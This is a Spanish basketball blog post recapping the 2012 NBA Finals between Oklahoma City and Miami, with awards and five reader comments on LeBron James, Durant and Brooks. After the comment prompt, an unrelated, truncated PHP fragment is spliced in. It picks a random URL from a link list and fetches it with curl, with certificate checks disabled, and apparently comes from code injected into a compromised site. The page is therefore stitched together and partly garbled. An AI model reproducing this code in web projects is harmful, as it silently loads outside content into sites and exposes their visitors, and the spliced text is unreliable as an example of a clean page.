Resumen Thunder 1 – Heat 4

26 de June de 2012 por TheDeerHunter

Se acabó. ¿Corto? pero intenso. Apenas nos acordamos ahora de que el anillo de 2012 se mantuvo demasiado tiempo en el limbo y algún avispado puede aprovechar para poner un asterisco a la campaña. Nada más lejos de la realidad. Tras una frenética regular y unos playoffs espectaculares, esta temporada será recordada para siempre como la que coronó a LeBron, ahora sí, como “King” James. El rey del mundo baloncestístico, venciendo simultáneamente a sus rivales y los prejuicios de mucha gente. Larga vida a “The Chosen One”.

“The best thing that happened to me last year was us losing the Finals. I knew what it was going to have to take, and I was going to have to change as a basketball player.”

La duda que se plantea ahora mismo ya no puede ser si LeBron es o no uno de los grandes. La duda es cómo de grande va a ser y donde está su techo una vez liberado del peso que le atenazaba. En el futuro alguien escribirá sobre los mejores partidos o las mejores actuaciones de la historia y por fuerza tendrá que relatar alguno/s de los que le hemos visto estas últimas semanas. Jugando esencialmente de interior y de hombre orquesta… a lo Magic, o frente a lo que puede ser un archirrival de época (también a lo Magic/Bird). De leyenda. La redención es merecida.

El año pasado alabábamos la sublimación del baloncesto colectivo de Dallas pero ahora no deberíamos repudiar los dos modelos basados en la concentración individual de ambos finalistas. No se puede negar la belleza del juego ofrecido por LeBron, Durant, Westbrook, Wade… si bien conviene destacar que en este punto ya hay diferencias entre la barbaridad de rendimiento de Durant y la de LeBron. Una de las claves del resultado ha sido efectivamente la diferente capacidad de involucrar a sus compañeros. Los dos últimos partidos del de Miami fueron sencillamente antológicos. La actuación de Miller en el definitivo debería ser objeto de estudios paranormales.

Erramos en nuestro pronóstico para la final. No tanto por la igualdad que augurábamos como que no se haya traducido en el marcador final. Ni remotamente imaginaba que esto podía terminar en 5. Sí diría que dimos de lleno en las claves: los problemas de marca de baluartes como Perkins, Ibaka, Collison o los propios Durant y Sefolosha; el rendimiento de Bosh frente a la decepción de Harden; la experiencia…

En definitiva, podemos lamentar que la finalísima no se haya alargado más. Nos gustan demasiado las resoluciones de infarto a 7 partidos. Sin embargo, el nivel ha sido altísimo, la guinda a unos playoffs fantásticos y el aperitivo a lo que puede convertirse en una rivalidad mayúscula los próximos años. Nos podemos dar por satisfechos.

PREMIOS

MVP: ¡Menudo bicho, Daimiel! Casi 29 puntos por partido, más de 10 rebotes, 7 asistencias y media, casi dos robos… Un papel decisivo en la defensa sobre Durant, en los finales apretados, moviendo a su equipo… Una actuación tan sumamente completa sólo la puede realizar un hombre en este planeta. Ya sabéis quién. Debemos mencionar también el gran trabajo “gregario” de Dwyane Wade para su segundo anillo.

Sorpresa: Además del gran rendimiento general de Chris Bosh, del que teníamos dudas razonables, tanto Shane Battier como Mario Chalmers se mostraron muy sólidos, incluso decisivos. Mención a parte el 7 de 8 en triples de Mike Miller en el último. Pocas horas antes le habíamos tachado de acabado para arriba.

Decepción: Oklahoma había blindado el juego interior para plantar cara a los Nowitzki, Gasol, Bynum, Boozer, Noah y compañía. En esta serie Perkins, Collison e Ibaka se han visto bastante desubicados. En cualquier caso la decepción en mayúsculas ha sido la actuación de James Harden. De 15.5 puntos y 5.5 asistencias, con más de un 60% de acierto en el tiro estos playoffs ha pasado a 12.4 puntos con 3.6 asistencias y un 37% de acierto.

Esfuerzo en vano: Poco más se les puede pedir a Kevin Durant y a Russell Westbrook. Grandiosos pero demasiado solos. Añadimos a la lista a Fisher, que una vez más ha sido un ejemplo. No cabe duda que, al menos los dos primeros, volverán a optar por la victoria muy pronto.

Comenta

5 comentarios a esta entrada

  1. Nacho dice:
    #1

    “Poco más se les puede pedir a Kevin Durant y a Russell Westbrook.”

    Yo creo que sí. Sobre todo al segundo. Jugar más en equipo. Si algo ha aprendido LeBron este año, y sobre todo en estas finales, es a jugar en equipo. Y además lo ha hecho sin perder un ápice de su importancia, sino al contrario. Hacer más grandes a sus compañeros le ha hecho hacerse más grande él. Y lo digo yo que soy uno de sus reconocidos ‘haters’.
    Cierto que en este aspecto doy más palos a Russell que a Durant. Pero no se puede ir de rositas este último. En algo ha fallado, y es bueno que lo sepa. Su defensa es mejorable, y su impronta de ‘boss’ también. Es joven y tiene margen. Pero alguien se lo debe decir.
    Brooks ha faltado en el análisis. Creo que no ha sabido manejar las finales. Todo lo que le alabamos contra los Spurs le ha faltado ahora. Salvo lo de sentar a Westbrook 7 minutos, que en eso estuvo muy bien.
    Y creo que a Spoelstra le debemos al menos un guiño.
    Todo lo demás, anáisis con el que coincido.
    Eso sí, para mí han sido unas finales que se presentaron como pufff… y acabaron también pufff…
    No por el juego, ojo. Pero debe ser aquí donde yo he notado el cambio generacional. Es como darte cuenta de que unos jovencitos vienen a tomarse las cervezas donde tú estás. Al principio dices “qué coño hacen estos aquí” y luego te das cuenta de que el que sobras eres tú. Que ahí quien se debe tomar las birras son esos jovencitos. Te vas porque toca. Pero jode.
    Y sí, yo hubiera disfrutado más con Boston y San Antonio. Otro año será! Que lo dudo.

      Citar

  2. Nacho dice:
    #2

    Me acabo de dar cuenta. El titular está cambiado.

      Citar

  3. M dice:
    #3

    Yo no acabo de estar de acuerdo en la consideración de que POR FIN LeBron ha jugado en equipo. Siempre lo he visto mucho más generoso en su juego que la mayoría de las grandes estrellas, y ha sido incluso criticado por ello (ese balón a Haslem…) Otra cosa es que tus compañeros encesten. Pero el número de tiros francos que ofrece Lebron con sus pases (creo que es su mejor virtud técnica) aprovechando las atenciones defensivas especiales de los rivales siempre han sido algo a destacar…y apenas se ha hecho.

    Un saludo 🙂

      Citar

  4. GreenPride dice:
    #4

    Unas series con buen nivel de baloncesto pero que nos han sabido a poco por lo que podrían haber podido llegar a ser. En la previa todos dábamos muchas claves y la impresión general era que los Thunder eran favoritos para las finales, hubo quién llegó a decir que acabarían rápido con los Heat sin embargo se ha demostrado varias cosas en esta eliminatoria:
    1) Los Heat han tirado de su experiencia para saber qué hacer en cada momento. No se pusieron nerviosos tras el primer partido y supieron salir fuertes en el 2º y el 3º para mantener a los Thunder siempre a remolque. Por contra los Thunder tuvieron que jugar casi siempre desde atrás y en muchas ocasiones han demostrado una inexperiencia y ansiedad que les ha perjudicado mucho tanto yendo por detrás como por delante (en el 4º ), incapaces de cambiar la tendencia de los partidos sobre todo en Miami.
    2) Jugadores sobrepasados por la eliminatoria frente a jugadores concienciados de qué debían hacer. Los Thunder han tenido varios jugadores por debajo de lo esperado. Sobre todos y clave en la eliminatoria Harden. Más allá de sus números que han caído en picado, su trascendencia en el juego ha sido nula. El hombre que llevaba la batuta durante muchos minutos del ataque (no necesariamente aportando los puntos) se ha visto totalmente desubicado y el ataque Thunder ha perdido su ritmo dedicándose mucho a acciones 1×1 de Durant y Westbrook y aislando a la mayoría de los secundarios. Enfrente, los Heat han sabido, probablemente por primera vez en estos dos años, jugar como un verdadero equipo leyendo las defensas Thunder y explotando sus ventajas empezando por LeBron en el poste o pick&roll entre Bosh y Wade y sabiendo mover la bola hasta encontrar a los tiradores abiertos (Battier, Chalmers, Miller y hasta Cole) que han respondido muy bien anotando puntos decisivos para romper la defensa.
    3) Actuación en defensa de los Heat y de LeBron frente a desconcierto Thunder. Todos los Heat han defendido a muerte con Battier muy bien sobre Harden sobre todo y LeBron aplicándose sobre Durant para complicarle los tiros sobre todo a partir del 3º. La defensa Heat ha ahogado el juego de ataque Thunder que han sobrevivido gracias al talento de Westbrook y Durant.
    4) Ideas claras frente a ansiedad. Los Heat han sabido seguir un patrón de juego y buscar sus puntos fuertes mientras los Thunder se han dejado llevar por la ansiedad (sobre todo Westbrook) y han buscado resolver más en individual sin buscar buenos tiros ni liberar lo suficiente a Durantula
    5) Desajustes en los emparejamientos y mala gestión de Brooks. Quizás la otra clave principal en cuanto al desarrollo del juego. ¿Que podía aportar Perkins en esta serie? Prácticamente nada, es más ha estorbado bastante a la defensa Thunder por su incapacidad de seguir a Wade o LeBron tras el pick&roll (eso que tan bien hace Garnett) y tampoco podía defender a Bosh por rápidez y no digamos ya a Battier. La supuesta superioridad Thunder en el interior se ha quedado en nada perdiendo hasta la lucha por los rebotes e incapaces de hacer daño a los Heat en toda la serie por dentro. Aquí Brooks no ha sabido qué hacer, ni ha surtido de balones a sus interiores para que hicieran daño por dentro a los Heat aunque no sean grandes atacantes ni ha decidido pasar de Perkins decididamente para intentar cambiar su defensa (¿Que tal probar una zona para parar penetraciones y pick&rolls?)
    6) LeBron VS Durant. Esta final es la de la consagración definitiva de LeBron. Ha hecho de todo y todo bien, ha metido puntos decisivos y ha defendido magníficamente a Durant a partir del tercer partido obligándole a forzar tiros. Además ha confiado en sus compañeros sabiendo no forzar demasiados tiros complicados ni exteriores en lo que ha sido una de las principales claves. Enfrente Durant ha sido el mejor de su equipo, decisivo en los finales de los 2 primeros partidos pero no ha podido con LeBron en defensa y no ha podido involucrar a sus demás compañeros a partir de sus ventajas. Ha recibido una dura lección (como LeBron la recibió en su momento) y no hay que dudar que volverá mejor y más fuerte en otras ocasiones. ¡Viva el Rey! Veremos si su corona dura o llega Durant a quitársela.
    Se termina la temporada con la sensación de que si no pasa algo raro podemos estar en los principios de una rivalidad Thunder-Heat (LeBronVsDurant) para unos años. Los Thunder son muy jovenes y se están curtiendo a las mil maravillas. Les queda un poquito más que madurar (Westbrook-Harden-Durant-Ibaka pueden y deben mejorar todavía) y el título puede ser suyo pero tendrán que saltar por encima de los Heat como es ley de vida (igual que los Heat han tenido que saltar por encima de los Celtics). Pueden ser años apasionantes. Veremos si estos dos equipos logran mantenerse en la cresta (lesiones y renovaciones pendientes pueden impedirlo) o si alguna otra franquicia acaba por dar el salto y ponerse a la altura. A los Bulls le queda un pelín, ¿Que pasará con Boston, Lakers, Spurs en los próximos años? ¿Funcionará el nuevo proyecto Cuban en Dallas? ¿Podrán dar el salto definitivo Grizzlies, Clippers o Pacers? ¿Conseguirán los Knicks ser contendientes? Veranito para ver cambios y que empiece la temporada 2012/13 cuanto antes….

      Citar

  5. Esteban dice:
    #5

    M coincido contigo, lebron siempre a tenido numeros enormes en aistencias, sucede que no siempre sus compañeros anotaban los tiros abiertos, recuerdo a MO y a jamison como principales responsables de su salida de los cavs, como tambien la lesion en la final frente a los spurs de larry huges, que hasta ese momento era su ladero y se perdio los dos primeros juegos y apenas jugo 3 o 4 minutos en los segundos dos

    una redencion enorme para lebron, sin esa mochila y con ese equipo, no se sabe su techo, mas aun q todos los veteranos quieren jugar con ellos

    deer, tambien lo dije antes de la serie, el thunder preparo su juego interior para enfrentar torres rocosas, especialmente el año pasado, hacerles frente a los campeones vigentes lakers, no estaban armados para defender una formacion baja, y les falto un alero defensivo fuerte para que al menos pudiera molestar a lebron

    lebron la rompio todos los partidos de PO, pero sin dudas que frente a pietrus, mas alla de sus estadisticias, nunca pudo ejercer una superioridad tan gande como en esta serie, donde como ya se dijo, genero 60 puntos, y por momentos parecio que no quizo hacer mas, y no que no pudo

    sin dudas de ahora en mas, cualquier equipo que pretenda ser campeon y quiera vencer al magic, debera conseguirse un alero fuerte fuerte que pueda marcar al poste bajo a lebron y si le tiene q hacer falta que no sea doble y libre

    el valor de metta world peace comienza a subir, y se me ocurren varios fortachones para esa tarea, como stevenson y marion, que pudieron complicarle las cosas el año pasado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>